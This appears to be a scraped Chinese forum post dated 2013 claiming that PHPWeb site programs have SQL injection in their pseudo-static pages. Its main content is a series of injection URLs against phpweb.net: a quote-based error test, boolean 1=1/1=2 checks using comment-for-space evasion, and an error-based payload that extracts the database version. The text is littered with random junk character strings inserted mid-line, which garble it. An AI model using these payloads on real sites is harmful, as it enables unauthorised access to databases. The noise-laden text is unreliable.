phpweb所有的整站程序伪静态页面都存在sql注入
8 P- C9 q. m2 I& t8 F3 |! J; E5 f' a8 \! P
主站:http://phpweb.net/2 V( [7 s& ] d9 Q) t- ~
加’检测:+ O2 Y. L, ^8 J- D3 O
& ^" `4 m. _/ @- S& O$ K X
http://www.phpweb.net/down/html/?772′.html
/ y* e8 [5 O7 d% @! k. A% H
# t& j3 c" x% I0 C出错
/ c t0 G% W; E H7 ?存在注入。8 J1 k' q6 W. o( a. F% U
不能用空格,只能用/*罗7 l9 d4 P! J9 \8 U) \
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
; Q7 `( `9 x1 B, \- A 1 }* z3 d3 H I' \/ g9 p ^4 Y
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.7 Y8 U% I& x. R5 T; u
爆数据库版本:
1 o7 V" e& Q2 }, P. W$ u9 b & J% Z9 C$ l, F# `& i ?, o$ P0 ]
?
; [ l9 K: f- X8 R; I" p1# K+ u& {& f$ l( _5 y
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html( V6 X3 T7 `$ y: f2 w
更新日期: 2013-01-03 13:39:50
( ^8 N: c% K6 _" D |